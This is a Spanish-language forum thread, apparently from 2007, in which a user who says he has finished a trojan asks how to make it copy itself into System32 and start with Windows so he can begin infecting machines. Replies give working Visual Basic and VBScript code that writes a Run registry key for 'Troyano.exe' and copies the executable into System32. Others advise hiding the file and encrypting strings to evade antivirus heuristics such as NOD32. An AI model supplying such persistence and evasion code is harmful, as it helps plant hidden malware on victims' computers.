Autor
|
Tema: copiar a system o system 32 (Leído 13,174 veces)
|
vivachapas
Desconectado
Mensajes: 612
|
bueno... habiendo terminado un troyano... esta vez mas elaborado aunque con muy poquitas funciones... :S queria ya empezar a infectar... pero para eso necesito q cuando se ejecute el server se copie a alguna carpeta donde no lo enceuntren facil... como system o system32 y q se ejecute con windows....
alguno sabe como hacerlo?? desde ya muchas gracias
|
|
|
En línea
|
|
|
|
Jareth
Desconectado
Mensajes: 334
|
Vamos,no te vamos a dar todo hecho,algo tan sencillo como añadirse a run y copiarse a system...busca un poco antes de postear. Ahora no tngo nada de tiempo,siento no poner code,pero esta en el foro. Saludos.
|
|
|
En línea
|
|
|
|
vivachapas
Desconectado
Mensajes: 612
|
bueno segui buscando y encontre la funcino para hacer q se ejecute con windows... la dejo aqui por si a alguien le hace falta: usamos: txtClave txtExe LabelInfo Private mReg As cQueryReg Private Const cvRun As String = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"
Dim s As String ' s = mReg.GetRegString(cvRun, txtClave.Text) If s <> "" Then LabelInfo.Caption = "La clave ya estaba asignada." & vbCrLf & s Else If mReg.SetReg(cvRun, txtClave.Text, txtExe.Text) = ERROR_NONE Then LabelInfo.Caption = "La clave se ha asignado correctamente." Else LabelInfo.Caption = "ERROR al crear la clave." End If End If no lo probe al codigo espero q ande... jeje no encontre como hacer a q se copie a system... me dijeron q era algo con clon pero nada por favor si alguno seria tan amable de acercarme el codigo o algun link se lo agradeceria mucho les dejo el link de donde saque la info http://www.elguille.info/VB/utilidades/ExeEnCurrentVersionRun.htm
|
|
« Última modificación: 2 Mayo 2007, 00:55 am por vivachapas »
|
En línea
|
|
|
|
|
vivachapas
Desconectado
Mensajes: 612
|
s = mReg.GetRegString(cvRun, txtClave.Text) no entiendo q tengo q poner en el txtClave??
|
|
|
En línea
|
|
|
|
Jareth
Desconectado
Mensajes: 334
|
dim clave as object set clave=CreateObject("WScript.shell") clave.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "Trojan" ,"c:\windows\system32\" & "Troyano.exe"
y para copiarse: Filecopy APP.apth & "\" & APP.exename & ".exe" ,"C:\WINDOWS\System32\troyano.exe"
Bueno ahi lo tienes. Saludos.
|
|
|
En línea
|
|
|
|
vivachapas
Desconectado
Mensajes: 612
|
muchas gracias..! ya lo pruebo
|
|
|
En línea
|
|
|
|
Hendrix
|
Es un error bastante comun presuponer que el windows esta instalado en el disco C:\....para asegurarte, utiliza la api GetSystemDirectory que te va a dar como resutlado: <HD>:\<carpeta de Windows>\System32 Otra cosa que puedes hacer es ocultarlo a la vista del usuario, es decir, dejando el archivo como archivo oculto, con el comando SetAttrTambien te recomiendo que si vas a usar VBS para añadirte al registro, encriptes las cadenas para evitar la heuristica de ciertos antivirus (Por ejemplo el Nod32). Un Saludo.
|
|
|
En línea
|
"Todos los días perdemos una docena de genios en el anonimato. Y se van. Y nadie sabe de ellos, de su historia, de su peripecia, de lo que han hecho, de sus angustias, de sus alegrías. Pero al menos una docena de genios se van todos los días sin que sepamos de ellos". - Juan Antonio Cebrián
|
|
|
BenRu
The Prodigy
Desconectado
Mensajes: 4.006
|
Es un error bastante comun presuponer que el windows esta instalado en el disco C:\....para asegurarte, utiliza la api GetSystemDirectory En un modulo: Public Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long Public Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Formulario: Private Sub Form_Load() Dim Car As String * 128 Dim Longitud, Es As Integer Dim Camino As String Dim win Dim sys Longitud = 128 Es = GetWindowsDirectory(Car, Longitud) Camino = RTrim$(LCase$(Left$(Car, Es))) win = Camino Es = GetSystemDirectory(Car, Longitud) Camino = RTrim$(LCase$(Left$(Car, Es))) sys = Camino End Sub Un saludo
|
|
|
En línea
|
|
|
|
vivachapas
Desconectado
Mensajes: 612
|
Tambien te recomiendo que si vas a usar VBS para añadirte al registro, encriptes las cadenas para evitar la heuristica de ciertos antivirus (Por ejemplo el Nod32). me podrias decir como lo cifro las cadenas?? Public Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long si yo quiero guardarlo solo en system32 necesito esta api solamente... o la otra tb??
|
|
|
En línea
|
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
Utilidad proceso SYSTEM
Windows
|
crazykenny
|
8
|
7,165
|
27 Abril 2011, 23:10 pm
por Randomize
|
|
|
System.Xml.Linq y System.Core
« 1 2 »
.NET (C#, VB.NET, ASP)
|
SγиtαxEяяoя
|
10
|
7,642
|
23 Junio 2013, 23:50 pm
por Eleкtro
|
|
|
[PC]System Shock (2020)
Juegos y Consolas
|
luiti
|
0
|
1,863
|
26 Septiembre 2020, 17:54 pm
por luiti
|
|
|
System.Net métodos
.NET (C#, VB.NET, ASP)
|
Beginner Web
|
0
|
1,969
|
6 Noviembre 2020, 23:33 pm
por Beginner Web
|
|
|
System Informer
Software
|
B€T€B€
|
1
|
4,377
|
13 Marzo 2023, 02:11 am
por ThunderCls
|
|